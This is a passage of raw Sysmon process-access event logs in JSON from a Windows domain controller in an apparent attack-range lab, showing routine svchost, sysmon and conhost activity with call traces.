ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 